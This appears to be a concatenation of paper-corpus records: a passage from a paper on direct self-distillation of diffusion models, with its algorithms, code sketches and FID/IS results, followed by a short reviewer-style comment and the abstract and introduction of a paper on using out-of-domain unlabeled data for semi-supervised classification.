where $N$ is the number of student sampling steps. This process sees three DDIM steps per student model parameter update. The refined teacher target, specific to PD, allows the student model to make more precise predictions, enhancing sampling efficiency. After training a student model with $N$ steps, the process is repeated with $N/2$ steps, where the student then serves as the new teacher. This iterative cycle, detailed in Algorithm 1, continues until a desired efficiency is achieved, significantly reducing sampling time while maintaining output quality.
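Since both PD and the method we introduce next are built from the same deterministic DDIM update, a minimal sketch of that primitive may be useful. The function below is illustrative (our notation, not an existing library API); it maps a latent at time $t$ to an earlier time $s$ given the model's current $x_0$ estimate, exactly as in the update lines of Algorithms 1 and 2.

```python
import torch

def ddim_step(x0_pred: torch.Tensor, z_t: torch.Tensor,
              alpha_t: float, sigma_t: float,
              alpha_s: float, sigma_s: float) -> torch.Tensor:
    """One deterministic DDIM update from time t to an earlier time s < t:
    z_s = alpha_s * x0_pred + (sigma_s / sigma_t) * (z_t - alpha_t * x0_pred),
    where x0_pred is the model's current estimate of the clean sample."""
    return alpha_s * x0_pred + (sigma_s / sigma_t) * (z_t - alpha_t * x0_pred)
```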
4 DIRECT SELF-DISTILLATION

We will refer to the general family of approaches that take a pre-trained model (the teacher) along with an image data-set, and distill it into a separate, new model (the student), as progressive distillation (PD) techniques. By contrast, we aim to distill a single model into itself, removing the need for a static teacher model or image data-set. That means that the distillation step at any point in training attempts to teach the pre-trained model to do in $N$ steps what it itself currently does in $2N$ steps. Variants of this approach will be labeled as forms of direct self-distillation (DSD).

---
3 When we apply this to distillation, we take two iterations of the UNet model, and distill the result back into the first. Therefore we don't quite distill into a smaller sub-network, but essentially do distill the output of a larger computation graph into a smaller sub-graph.

4.1 Fine-tuning DSD

Let $x_0 \sim D$ represent a sample from the dataset. Diffusion works by generating a sequence of $T$ latent variables $z_1, \ldots, z_T$ by progressively adding noise to the data, so that $z_T \sim N(0, I)$. A UNet model $\hat{x}_\theta$ is then trained to reverse this process. In most diffusion models, $\hat{x}_\theta(z_t)$ predicts the noise vector $\epsilon_t$ for which $z_t = \alpha_t x_0 + \sigma_t \epsilon_t$. From this, we can predict both $x_0$ and $z_{t-1}$. Sampling is then performed by starting with a sample $z_T \sim N(0, I)$ and progressively denoising it.

In direct self-distillation, we are given a pre-trained model $\hat{x}_\theta$. We perform a full DDIM sample of $N$ iterations. Note that when we sample from $\hat{x}_\theta$, $t$ indexes backwards from $N$ to $0$. We compute two steps of DDIM for every step of self-distillation. Starting at $z_t$, this produces $z_{t-1}$ and $z_{t-2}$. We then update according to the loss function $w(\lambda_t) \cdot \|x_{t-1} - x_{t-2}\|^2$, where $w(\lambda_t)$ represents a weighting function. We back-propagate only over the computation of $z_{t-1}$, detaching the computation of $z_{t-2}$. This ensures that in the above loss, $x_{t-1}$ functions as a prediction and $x_{t-2}$ functions as a target, with the network learning to adapt the former to the latter. See Figure 1 for a diagrammatic comparison between DSD and PD.

As the weighting $w(\lambda_t)$, we use the truncated Signal-to-Noise Ratio (SNR), which puts more emphasis on parameter updates at higher SNR values, aiming to improve image sharpness. The truncation in $w$ keeps the weighting from vanishing during early DDIM steps with low SNR, which becomes increasingly important as DSD progresses towards fewer DDIM steps with higher noise values.

Below we outline the DSD algorithm, together with the progressive distillation (PD) algorithm for comparison. Note that in DSD, $\theta$ represents the parameters of the given model, which is fine-tuned directly.
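To make the update above concrete, the following is a minimal sketch of one fine-tuning DSD step under our reading of the procedure (it is not the released implementation): two DDIM steps are taken with the `ddim_step` helper sketched in Section 3, the $x_0$ estimate of the second step serves as a detached target for that of the first, and the loss is weighted by the truncated SNR. `model(z, t)` is a hypothetical network returning an $x_0$ prediction; `alphas` and `sigmas` are sequences of per-step schedule coefficients.

```python
import torch

def dsd_update(model, opt, z_t, t, alphas, sigmas):
    """One fine-tuning DSD step (cf. Algorithm 2); assumes t >= 2."""
    a_t, s_t = alphas[t], sigmas[t]
    a1, s1 = alphas[t - 1], sigmas[t - 1]
    a2, s2 = alphas[t - 2], sigmas[t - 2]

    x_pred = model(z_t, t)                     # prediction x': gradients flow here
    z_t1 = ddim_step(x_pred, z_t, a_t, s_t, a1, s1)

    with torch.no_grad():                      # target branch x'' is detached
        x_target = model(z_t1, t - 1)
        z_t2 = ddim_step(x_target, z_t1, a1, s1, a2, s2)

    w = max((a_t / s_t) ** 2, 1.0)             # truncated SNR weighting w(lambda_t)
    loss = w * ((x_pred - x_target) ** 2).mean()

    opt.zero_grad()
    loss.backward()
    opt.step()
    return z_t2, loss.item()                   # z_{t-2} continues the trajectory
```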
4.1.1 Scheduling $N$

In PD, the student is trained until convergence, after which the number of sampling steps $N$ is halved and the old student becomes the new teacher. In DSD, we do not require that training converges. Instead, we define three different schedules for how $N$ should decrease during training, and how many samples we take for each $N$. Experimentally, we find a good approach is to keep the total parameter updates seen for each depth $N_i$ approximately constant. If, for instance, we decay $N_i$ linearly but keep the number of samples for each $N_i$ the same, more parameter updates are performed for the higher $N_i$, since we update once for every two sampling steps. Instead, we adjust the number of samples taken, referred to as $U_i$, to keep the number of parameter updates for each $N_i$ roughly equal.

Naive DSD (DSDN). In DSDN, $N_i$ and $U_i$ remain constant throughout distillation. This approach does not ultimately reduce the number of denoising steps required for generation. Note, however, that we still distill later denoising steps into earlier ones, so we can still expect to see high-quality output after fewer steps than in the original model, if training is successful.

---
4 The model also receives $t$ as a parameter, but this is omitted to simplify the notation.
5 If convergence-based scheduling is preferred, intermittent FID/IS score calculation can provide such metrics in the absence of a converging loss function.
6 Since we do not require a new model to be copied when we change $N$, we are more flexible in reducing $N$ gradually.

Algorithm 1 PD (from Salimans & Ho, 2022)
Require: Trained teacher model $\hat{x}_\eta(z_t)$; data set $D$; loss weight function $w()$; sampling steps $N$
for $K$ iterations do
    $\theta \leftarrow \eta$  ▷ Init student from teacher
    while not converged do
        $x \sim D$
        $t = i/N$, $i \sim \text{Cat}[1, 2, \ldots, N]$
        $\epsilon \sim N(0, I)$
        $z_t = \alpha_t x + \sigma_t \epsilon$
        # 2 steps of DDIM with the teacher
        $t' = t - 0.5/N$, $t'' = t - 1/N$
        $z_{t'} = \alpha_{t'} \hat{x}_\eta(z_t) + \frac{\sigma_{t'}}{\sigma_t}(z_t - \alpha_t \hat{x}_\eta(z_t))$
        $z_{t''} = \alpha_{t''} \hat{x}_\eta(z_{t'}) + \frac{\sigma_{t''}}{\sigma_{t'}}(z_{t'} - \alpha_{t'} \hat{x}_\eta(z_{t'}))$
        $\tilde{x} = \frac{z_{t''} - (\sigma_{t''}/\sigma_t)z_t}{\alpha_{t''} - (\sigma_{t''}/\sigma_t)\alpha_t}$  ▷ Teacher target $\tilde{x}$
        $\lambda_t = \log[\alpha_t^2/\sigma_t^2]$
        $L_\theta = w(\lambda_t)\|\tilde{x} - \hat{x}_\theta(z_t)\|^2$
        $\theta \leftarrow \theta - \gamma \nabla_\theta L_\theta$
    end while
    $\eta \leftarrow \theta$  ▷ Student becomes next teacher
    $N \leftarrow N/2$  ▷ Halve # of sampling steps
end for

Algorithm 2 Fine-tuning DSD
Require: A trained model $\hat{x}_\theta(z_t)$; loss weight function $w()$; schedule of # of updates $U$ and steps $N$
for $U_i$ updates do
    for $t \in \{N_i, N_i - 2, N_i - 4, \ldots, 2\}$ do
        $z_t = $ sample from $N(0, I)$ if $t = N_i$, else $z_{t''}$ from the previous iteration
        # 2 steps of DDIM
        $t' = t - 1$, $t'' = t - 2$
        $z_{t'} = \alpha_{t'} \hat{x}_\theta(z_t) + \frac{\sigma_{t'}}{\sigma_t}(z_t - \alpha_t \hat{x}_\theta(z_t))$
        $z_{t''} = \alpha_{t''} \hat{x}_\theta(z_{t'}) + \frac{\sigma_{t''}}{\sigma_{t'}}(z_{t'} - \alpha_{t'} \hat{x}_\theta(z_{t'}))$
        $x' = \frac{z_{t'} - (\sigma_{t'}/\sigma_t)z_t}{\alpha_{t'} - (\sigma_{t'}/\sigma_t)\alpha_t}$  ▷ predicted $\hat{x}$
        $x'' = \frac{z_{t''} - (\sigma_{t''}/\sigma_{t'})z_{t'}}{\alpha_{t''} - (\sigma_{t''}/\sigma_{t'})\alpha_{t'}}$  ▷ target $\hat{x}$, detached
        $\lambda_t = \log[\alpha_t^2/(1 - \alpha_t^2)]$
        $L_\theta = w(\lambda_t)\|x' - x''\|^2$
        $\theta \leftarrow \theta - \gamma \nabla_\theta L_\theta$
    end for
end for

Iterative DSD (DSDI). In DSDI, we implement a similar scheduling approach to that of progressive distillation, where the total steps are progressively halved during the distillation process. We first set the total number of parameter updates $P$.
We then have $N_{i+1} = N_i/2$ and $U_i = \frac{P}{|N|} \cdot \frac{1}{N_i}$, with $|N|$ being the total number of different step-size depths $N_i$ we use. Additionally, we introduce teacher-student distillation (TSD) with identical scheduling to DSDI, which similarly forgoes sampling from an existing data-set, yet differs from DSD in that we instead mimic PD and introduce a separate teacher model to produce the distillation targets.

Gradual DSD (DSDGL). In gradual DSD, we decay the number of sampling steps by two per iteration, so that $N_{i+1} = N_i - 2$. The formula for $U_i$ is the same as before.

4.2 Training DSD

If self-distillation works for fine-tuning an already-trained model, it is reasonable to ask whether we might also apply it during the original training phase of the model. In this setting, we are training from data, and we are not necessarily sampling from the model, so we adapt our method to minimize the amount of overhead that the inclusion of self-distillation requires. Given that direct self-distillation does not require any pre-trained teacher model, it becomes possible for a diffusion model to distill into itself during the training phase. During such a process, the distillation loss, calculated as the error between two successive DDIM steps as depicted in Figure 1, can either be used on its own to update the diffusion model's parameters, or be incorporated in combination with the training loss during each step. The training loss is the squared difference between the predicted $\hat{v}_t$ and the true $v_t$, following the v-prediction parameterization described in Salimans & Ho (2022). The total loss is then supplemented by the distillation loss between the predicted $x'$ and the predicted $x''$, similar to that of Algorithm 2:

$$L = \alpha \cdot \|\hat{v}_t - v_t\|^2 + \beta \cdot \|x' - x''\|^2,$$

where $\alpha$ and $\beta$ are hyper-parameters used to balance the main loss and the distillation loss, respectively. Since $z_t$ is a component in both the calculation of $v_t$ and $x'$, it only needs to be calculated once, with a single computation graph.
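As a concrete but hypothetical rendering of this combined objective for a v-prediction model, both terms can be computed from a single forward pass at time $t$, plus one extra, gradient-free evaluation for the distillation target. The `ddim_step` helper from Section 3 is reused; the weights `a` and `b` follow the values later used in Section 5.2, and all other names are illustrative.

```python
import torch

def training_dsd_loss(model, x0, t, alphas, sigmas, a=0.85, b=0.15):
    """Combined loss L = a * ||v_pred - v||^2 + b * ||x' - x''||^2 for a
    v-prediction model(z, t); assumes t >= 1."""
    eps = torch.randn_like(x0)
    a_t, s_t = alphas[t], sigmas[t]
    z_t = a_t * x0 + s_t * eps                 # forward-diffuse the data to time t
    v_true = a_t * eps - s_t * x0              # v-prediction target

    v_pred = model(z_t, t)
    x_pred = a_t * z_t - s_t * v_pred          # implied x0 prediction x'

    with torch.no_grad():                      # distillation target x'' is detached
        z_prev = ddim_step(x_pred, z_t, a_t, s_t, alphas[t - 1], sigmas[t - 1])
        v_next = model(z_prev, t - 1)
        x_target = alphas[t - 1] * z_prev - sigmas[t - 1] * v_next

    train_loss = ((v_pred - v_true) ** 2).mean()
    distill_loss = ((x_pred - x_target) ** 2).mean()
    return a * train_loss + b * distill_loss
```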
5 RESULTS

Evaluation and training details. To compare these different methods, we use the Fréchet Inception Distance (FID) and Inception Score (IS) to evaluate image sampling performance at various DDIM steps. For unconditional image generation, we use the models from Rombach et al. (2022) pre-trained on the CelebA-HQ 256² dataset (Karras et al., 2018) and LSUN Bedroom (Yu et al., 2015), as well as the conditional model from the same source trained on the ImageNet-256² dataset (Deng et al., 2009). We compare three scheduling approaches for DSD to values reported in the relevant PD literature, in addition to TSD. During the distillation process, we set the guidance scale to be randomly sampled from $w = [1.0, 3.0]$, and all distillation attempts for the conditional and unconditional models receive 5,000 and 4,000 total parameter updates ($P$), respectively. The hyperparameters used for both the conditional and unconditional models are shown in Table 5 in the appendix.

In previous research on the distillation of conditional diffusion models by Meng et al. (2023), Progressive Distillation required re-training of the original model to predict $x_0$ without the use of a separate guidance forward pass, as running both passes caused divergence during the distillation process. Our approach does not involve this procedure, as our goal is not to distill down to as few sampling steps as possible, but rather to compare DSD to Progressive Distillation while reducing the number of model updates required for similar image quality.

The learning rates for all three models were kept identical between the different distillation procedures to ensure a fair comparison between the DSD/TSD implementations and PD. More specifically, we optimized the learning rate for TSD and then applied these values to DSD without further optimization, to achieve a conservative estimate of the relative benefit of DSD over PD, given that TSD more closely resembles PD. The implementation of progressive distillation by Salimans & Ho (2022) saw the learning rate reduced to 0 during each halving of the total DDIM steps. Given our lower number of total parameter updates, we instead implemented a cosine annealing schedule for the learning rate, gradually decreasing it to 10% of the original learning rate over the duration of each distillation procedure. This was found to improve the distillation stability of TSD, and therefore by extension DSDI, which both see fewer DDIM steps as the distillation progresses. This annealing schedule was then applied to all DSD methods.

5.1 Fine-tuning DSD

Table 1 shows the FID scores for the original unconditional CelebA-HQ and LSUN Bedroom models, as well as the FID/IS scores for the conditional ImageNet-256 model.

Unconditional models. Distillation results in terms of FID scores of the unconditional CelebA-HQ and LSUN Bedroom models are shown in Table 2, with the undistilled models' performance detailed in Table 1. A visual comparison between the different DDIM steps for CelebA-HQ is given in Appendix 2. Given the absence of image classes for either dataset, only FID scores were used to compare image fidelity between the different distillation types and numbers of DDIM steps. For CelebA-HQ, for which at the time of writing no PD counterpart was found, both 2- and 4-step DSDI show a minor lead over the other self-distillation types, with DSDN demonstrating a slight improvement at 8 steps. TSD shows what performance may be expected when performing indirect self-distillation.

---
7 The original pretrained LSUN Bedroom model was configured to produce latent images at 64x64, before being upsampled within the pixel-space to 256x256, similar to the other models. We altered the configuration to match the output of 128x128 for comparison against results obtained from the Progressive Distillation implementation by Salimans & Ho.
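For reference, a minimal sketch of how the FID and IS metrics above can be computed with the torchmetrics package (an assumption on our part; any Inception-based implementation would do). The random tensors below are placeholders standing in for batches of real images and generated DDIM samples.

```python
import torch
from torchmetrics.image.fid import FrechetInceptionDistance
from torchmetrics.image.inception import InceptionScore

fid = FrechetInceptionDistance(feature=2048)   # Inception pool features
inception = InceptionScore()

# Placeholders: swap in real dataset batches and DDIM samples from the
# distilled model (uint8, NCHW, values in [0, 255]).
real = torch.randint(0, 256, (16, 3, 256, 256), dtype=torch.uint8)
fake = torch.randint(0, 256, (16, 3, 256, 256), dtype=torch.uint8)

fid.update(real, real=True)
fid.update(fake, real=False)
inception.update(fake)

print("FID:", fid.compute().item())
is_mean, is_std = inception.compute()
print("IS:", is_mean.item(), "+/-", is_std.item())
```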
Table 1: FID scores for the pre-trained CelebA-HQ and LSUN Bedroom models and FID/IS scores for the Conditional ImageNet-256 model, prior to distillation, at 2, 4, 8, 16, 32, and 64 DDIM steps, calculated over 5K sample images per combination of model and sampling steps.

Conditional DDIM – FID(↓) / IS(↑):

| Model | PD | TSD (ours) | DSDI (ours) | DSDN (ours) | DSDGL (ours) |
|---|---|---|---|---|---|
| ImageNet-256 2-step (5K) | **14.55 / 120.00** (52K*) | 129.54 / 4.60 | 119.98 / 5.20 | 100.26 / 7.98 | 132.03 / 4.38 |
| ImageNet-256 4-step (5K) | 13.19 / 126.36 (32K*) | 20.21 / 61.33 | 15.15 / 87.85 | **10.27 / 126.61** | 20.01 / 82.70 |
| ImageNet-256 8-step (5K) | 12.72 / 128.63 (12K*) | **9.51** / 180.49 | 9.78 / 184.24 | 13.69 / **198.43** | 14.46 / 140.68 |

Unconditional DDIM – FID(↓):

| Model | PD | TSD (ours) | DSDI (ours) | DSDN (ours) | DSDGL (ours) |
|---|---|---|---|---|---|
| CelebA-HQ 2-step (4K) | – | 151.01 | **136.45** | 137.38 | 145.61 |
| CelebA-HQ 4-step (4K) | – | 69.12 | **41.46** | 45.78 | 52.40 |
| CelebA-HQ 8-step (4K) | – | 28.92 | 19.51 | **19.28** | 24.25 |
| LSUN Bedroom 2-step (4K) | **6.70** (400K**) | 183.76 | 141.89 | **104.48** | 142.24 |
| LSUN Bedroom 4-step (4K) | 3.53 (450K**) | 78.69 | 43.56 | **30.50** | 38.91 |
| LSUN Bedroom 8-step (4K) | 2.31 (550K**) | 23.59 | 17.87 | **11.20** | 28.01 |

Table 2: FID scores at 2, 4, and 8 DDIM steps for the distilled unconditional CelebA-HQ and LSUN Bedroom pretrained models (calculated after 4,000 parameter updates), and FID/IS scores for the distilled conditional pretrained ImageNet-256 model (calculated after 5,000 parameter updates). The Inception Scores were calculated using 5,000 generated samples for each combination of model, step size, and distillation procedure, with 30,000 samples used for the FID calculation. PD shows baseline results of previous Progressive Distillation techniques, with * indicating results and numbers of model parameter updates taken from figures in Meng et al. (2023), compared against 5,000 samples. ** indicates results and numbers of model parameter updates similarly obtained from figures in Salimans & Ho (2022).

Interestingly, for the LSUN Bedroom model, DSDN outperforms the other direct self-distillation methods by quite a large margin, although at very low numbers of sampling steps the image fidelity does not quite match that of the Progressive Distillation baseline gathered from Salimans & Ho (2022). Regardless, a great improvement in image quality is gained at these steps with just 4,000 parameter updates, far fewer than the roughly 400 to 500 thousand updates required by PD. It should however be noted that our implementation of distillation, particularly self-distillation, may be introducing variance to the pixel distributions of the model's generated images. This is due to the sampling of distillation targets from the model's own output, compared to existing methods which sample real images before adding Gaussian noise. Inception Scores are therefore more representative of image quality and diversity, although unavailable when sampling without conditional classes.

Conditional models. For the distilled class-conditional ImageNet-256 models, Table 2 shows the results of the distilled models in terms of FID and IS scores. Regarding IS, DSDN outperforms all other DSD methods, suggesting that DSDN is able to improve distinct image features faster.
In Figure 2 we see a comparison given the same initial noisy latent $z_T$, which shows how DSDN seems to outperform the other distilled models after both 4 and 8 steps in subjective image quality as well. At 4 steps, the outlines of the four classes appear to have more detail and clarity, plus improved contrast and colour saturation. At 8 steps, some novel image structures are introduced, where for example the caudal fin (vertical tail fin) of the great white shark sample is defined only in the DSDN model, even improving upon the image coherence of the respective original 64-step model's image. Such examples of DSDN seemingly surpassing the original full-step model were common during sample generation.

Compared to the existing Progressive Distillation method for conditional models by Meng et al. (2023), we are outperformed at very low DDIM steps. At this stage, they performed between 12 and 52 thousand parameter updates, while our results were obtained after just 5,000. Still, DSDN in particular sees improved image quality at 4 and 8 DDIM steps despite the relatively short training period. Interestingly, both the FID and IS scores as detailed by Meng et al. (2023) don't improve much as the number of steps increases.

We note the large difference between the minimum FID scores obtained by the baseline PD papers compared to our methods. It is possible that our decision to perform distillation from a maximum of 64 DDIM steps may have contributed to increased deviation from the datasets' pixel distributions. This could be explained by the decrease of the relative signal-to-noise ratio during the distillation process compared to distilling from 256 (Meng et al., 2023) or 1024 (Salimans & Ho, 2022) DDIM steps.

Figure 2: (left) Random 4- and 8-step samples from a) the distilled unconditional CelebA-HQ 256x256 model and b) the distilled conditional ImageNet-256² model, including 64-step samples from the undistilled models. (right) Random 128-step samples from trained and trained-distilled models for c) LSUN Bedroom, d) CelebA, and e) LSUN Church Outdoor datasets.

5.2 Training DSD

We apply training DSD on three separate datasets: the 64x64-pixel versions of the CelebA, LSUN Bedroom, and LSUN Church Outdoor datasets. The loss function $L$ is defined as a weighted sum of the training loss and the distillation loss. All three models were trained with v-prediction as their output, similar to that described in Salimans & Ho (2022). For CelebA, a total of 65,000 parameter updates were performed at a learning rate of $10^{-4}$, whereas the LSUN Bedroom model was trained for 50,000 parameter updates at a learning rate of $4 \cdot 10^{-4}$, with the LSUN Church Outdoor model being trained at the same learning rate for just 40,000 parameter updates. For distillation during training, $\alpha$ and $\beta$ were set to $0.85$ and $0.15$, respectively. Setting $\beta$ to such a low value inhibits the effect of the distillation loss during the early stages of training, when the model has not yet matured. During this phase, consecutive DDIM steps still show little variation, lowering the importance of distillation at this time. In the later stages, when the training loss stabilizes and successive DDIM steps add improvements to image fidelity, the distillation loss becomes more important. Further research could attempt a dynamic weight scheduling between these two parameters to optimize distillation during training.
Post-training samples for all three models are shown in Figure 2, with the corresponding FID scores depicted in Figure 3. For the LSUN Bedroom model, subtle improvements to features in the images can be seen when distillation is performed, with the final FID score improving mostly towards the end of the training process, during which the distillation loss affects the model's weight updates the most and training without distillation starts to plateau. However, such improvements were not clearly seen for the CelebA dataset, where despite subjective improvements between the samples with and without distillation, no clear improvement in FID is found. Interestingly, the FID scores show a nearly identical trend throughout the training process. The early stabilisation of the FID scores, around just 20 to 25 thousand steps, may indicate that the training loss decreased more rapidly than was the case for the LSUN Bedroom dataset, where the distillation loss had relatively little impact later on during training. For the LSUN Church Outdoor dataset, a more gradual decline in FID is seen, with the distilled model finally overtaking during the later training phase. Similar to the results of the LSUN Bedroom model, distinct image features seem to appear in the distilled model before they become visible in the non-distilled counterpart.

Figure 3: FID scores for the trained and train-distilled models on the a) LSUN Bedroom, b) CelebA, and c) LSUN Church Outdoor datasets.

6 CONCLUSION

Our results demonstrate the applicability of self-distillation to diffusion settings, both for fine-tuning a pre-trained model and for training a diffusion model from scratch. We have also tested different schedules for reducing the sampling steps during (self-)distillation. We find that on the datasets tested, a linear reduction may perform better than the halving schedule used in progressive distillation, but the specifics appear highly dependent on the task. In some cases, a naive approach without any scheduling (DSDN) performs best. This could be explained by the relative increase in parameter updates at lower depths compared to other DSD approaches, similar to the Progressive Distillation techniques, where the total number of denoising steps performed is lowered after each distillation step.

By forgoing the use of a separate teacher model, DSD reduces the network evaluations required per parameter update from 3 (Salimans & Ho, 2022) down to just 2. This also implies that, unless the teacher outputs have previously been cached, DSD frees up the GPU memory taken up by a teacher model, reducing the hardware requirements of diffusion model distillation. DSD also demonstrates improved convergence during distillation, requiring fewer total parameter updates to reach a similar or improved level of image quality.

Limitations and future work. One important limitation of DSD is the requirement to train sequentially, in concert with the denoising process. This means that the samples we train on are not fully i.i.d., but in practice this does not appear to seriously impact learning. The benefit is that no dataset is required during fine-tuning, simplifying the training process. Our results on training DSD suggest that self-distillation may be employed favorably in training models from scratch. However, how this approach behaves at scale, and whether it leads directly to models that generate high-quality images in 1-10 sampling steps without a two-stage training process, remains to be seen.
Additionally, studying the combination of DSD with existing non-direct distillation approaches might demonstrate DSD’s strengths in quickly decreasing the required number of sampling steps before distilling down to 1-2 sampling steps using existing methods. Answering this question experimentally likely requires substantial experimental resources. We leave this question to future work. 7 REPRODUCIBILITY STATEMENT Our code is publicly available at https://anonymous.4open.science/r/DSD. The hyperparameters used for the DSD implementations are provided in Table 3 in the Appendix. The full specifications for the models used in training DSD are available as configuration files in the repository. The processes for calculating the FID and Inception Score metrics for all models are likewise made available. All distilled model checkpoints, including all generated samples for each implementation and number of DDIM steps, will be made available on the public repository. REFERENCES Cristian Buciluţă, Rich Caruana, and Alexandru Niculescu-Mizil. Model compression. In Proceedings of the 12th ACM SIGKDD international conference on Knowledge discovery and data mining, pp. 535–541, 2006. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255, Jun 2009. doi: 10.1109/CVPR.2009.5206848. Jianping Gou, Baosheng Yu, Stephen J Maybank, and Dacheng Tao. Knowledge distillation: A survey. International Journal of Computer Vision, 129:1789–1819, 2021. Geoffrey E. Hinton, Oriol Vinyals, and Jeffrey Dean. Distilling the knowledge in a neural network. CoRR, abs/1503.02531, 2015. URL http://arxiv.org/abs/1503.02531 Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. doi: 10.48550/ARXIV.2207.12598. URL https://arxiv.org/abs/2207.12598. A short version of this paper appeared in the NeurIPS 2021 Workshop on Deep Generative Models and Downstream Applications: https://openreview.net/pdf?id=qw8AKxfYbI. Jonathan Ho, William Chan, Chitwan Saharia, Jay Whang, Ruiqi Gao, Alexey Gritsenko, Diederik P. Kingma, Ben Poole, Mohammad Norouzi, David J. Fleet, and Tim Salimans. Imagen Video: High Definition Video Generation with Diffusion Models. doi: 10/grr3bd. URL https://arxiv.org/abs/2210.02303 Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In Hugo Larochelle, Marc’Aurelio Ranzato, Raia Hadsell, Maria-Florina Balcan, and Hsuan-Tien Lin (eds.), Advances in Neural Information Processing Systems 33: Annual Conference on Neural Information Processing Systems 2020, NeurIPS 2020, December 6-12, 2020, virtual, 2020. URL https://proceedings.neurips.cc/paper/2020/hash/4c5bcfec8584af0d967f1ab10179ca4b-Abstract.html Jiaxin Huang, Shixiang Shane Gu, Le Hou, Yuexin Wu, Xuezhi Wang, Hongkun Yu, and Jiawei Han. Large language models can self-improve. CoRR, abs/2210.11610, 2022. doi: 10.48550/arXiv.2210.11610. URL https://doi.org/10.48550/arXiv.2210.11610 Tero Karras, Timo Aila, Samuli Laine, and Jaakko Lehtinen. Progressive growing of gans for improved quality, stability, and variation. In 6th International Conference on Learning Representations, ICLR 2018, Vancouver, BC, Canada, April 30 - May 3, 2018, Conference Track Proceedings. OpenReview.net, 2018. URL https://openreview.net/forum?id=Hk99zCeAb Guohao Li, Matthias Müller, Bernard Ghanem, and Vladlen Koltun. Training graph neural networks with 1000 layers. 
In International conference on machine learning, pp. 6437–6449. PMLR, 2021. Eric Luhman and Troy Luhman. Knowledge distillation in iterative generative models for improved sampling speed. CoRR, abs/2101.02388, 2021. URL https://arxiv.org/abs/2101.02388 Troy Luhman and Eric Luhman. Improving diffusion model efficiency through patching. doi: 10.48550/ARXIV.2207.04316. URL https://arxiv.org/abs/2207.04316
Bo6GpQ3B9a
When n=0, no out-of-domain samples are utilized and the problem reduces to simple ERM. But in Theorem 4.2, when n=0, the dependence of the error on dimension is d^{3/8}, meaning that this reduction in the exponent of the dimension is not related to the utilization of out-of-domain samples.
OUT-OF-DOMAIN UNLABELED DATA IMPROVES GENERALIZATION Amir Hossein Saberi †∗ Amir Najafi † Alireza Heidari † Mohammad Hosein Movasaghinia † Seyed Abolfazl Motahari † Babak H. Khalaj‡§∗ ∗ Department of Electrical Engineering, † Department of Computer Engineering, ‡ Sharif Center for Information Systems and Data Science. § Sharif Institute for Convergence Science & Technology, Sharif University of Technology, Tehran, Iran ABSTRACT We propose a novel framework for incorporating unlabeled data into semi-supervised classification problems, where scenarios involving the minimization of either i) adversarially robust or ii) non-robust loss functions have been considered. Notably, we allow the unlabeled samples to deviate slightly (in total variation sense) from the in-domain distribution. The core idea behind our framework is to combine Distributionally Robust Optimization (DRO) with self-supervised training. As a result, we also leverage efficient polynomial-time algorithms for the training stage. From a theoretical standpoint, we apply our framework on the classification problem of a mixture of two Gaussians in $\mathbb{R}^d$, where in addition to the $m$ independent and labeled samples from the true distribution, a set of $n$ (usually with $n \gg m$) out of domain and unlabeled samples are given as well. Using only the labeled data, it is known that the generalization error can be bounded by $\propto (d/m)^{1/2}$. However, using our method on both isotropic and non-isotropic Gaussian mixture models, one can derive a new set of analytically explicit and non-asymptotic bounds which show substantial improvement on the generalization error compared to ERM. Our results underscore two significant insights: 1) out-of-domain samples, even when unlabeled, can be harnessed to narrow the generalization gap, provided that the true data distribution adheres to a form of the “cluster assumption”, and 2) the semi-supervised learning paradigm can be regarded as a special case of our framework when there are no distributional shifts. We validate our claims through experiments conducted on a variety of synthetic and real-world datasets. 1 INTRODUCTION Semi-supervised learning has long been a focal point in the machine learning literature, primarily due to the cost-effectiveness of utilizing unlabeled data compared to labeled counterparts. However, unlabeled data in various domains, such as medicine, genetics, imaging, and audio processing, often originates from diverse sources and technologies, leading to distributional differences between labeled and unlabeled samples. Concurrently, the development of robust classifiers against adversarial attacks has emerged as a vibrant research area, driven by the rise of large-scale neural networks [Goodfellow et al., 2014] [Biggio & Roli, 2018]. While the primary objective of these methods is to reduce model sensitivity to minor adversarial perturbations, recent observations suggest that enhancing adversarial robustness may also improve the utilization of unlabeled samples [Najafi et al., 2019] [Miyato et al., 2018]. This paper aims to demonstrate the efficacy of incorporating out-of-domain unlabeled samples to decrease the reliance on labeled in-domain data. To achieve this, we propose a novel framework inspired by a fusion of concepts from adversarial robustness and self-training. Specifically, we introduce a unique constraint to the conventional Empirical Risk Minimization (ERM) procedure, focusing exclusively on the unlabeled part of the dataset. 
∗Corresponding author: [email protected].

Our theoretical and experimental analyses show that the inclusion of unlabeled data reduces the generalization gap for both robust and non-robust loss functions. Importantly, our alternative optimization criteria are computationally efficient and can be solved in polynomial time. We have implemented and validated the effectiveness of our method on various synthetic and real-world datasets.

From a theoretical standpoint, akin to prior research (Schmidt et al., 2018; Carmon et al., 2019; Zhai et al., 2019; Alayrac et al., 2019), we also address the binary classification problem involving two Gaussian models in $\mathbb{R}^d$. This problem has been the center of attention in several recent works on the theoretical analysis of semi-supervised and/or adversarially robust learning paradigms. Despite several recent theoretical investigations, the precise trade-off between the sizes of the labeled ($m$) and unlabeled ($n$) data, even in this specific case, remains incomplete. A number of works have bounded the labeled sample complexity under the assumption of an asymptotically large $n$ (Kumar et al., 2020), while another series of papers has analyzed this task from a completely unsupervised viewpoint. We endeavor to fill this gap by providing the first explicit trade-off between $m$ and $n$, even when the unlabeled data originates from a slightly perturbed distribution. We derive explicit bounds for both robust and non-robust losses of linear classifiers in this scenario. Our results show that as long as $n \geq \Omega\left(\frac{m^2}{d}\right)$, our proposed algorithm surpasses traditional techniques that rely solely on labeled data. We also consider the more general case of non-isotropic Gaussian models, as explored in previous studies.

The remainder of this paper is structured as follows: Section 1.1 provides an overview of related works in distributionally robust optimization and semi-supervised learning. Section 1.2 discusses the contributions made by our work, and Section 1.3 introduces our notation and definitions. In Section 3, we present our novel method, followed by a theoretical analysis in Section 4. Section 5 showcases our experimental validations, further supporting our theoretical findings. Finally, we draw conclusions in Section 6.

1.1 PRIOR WORKS

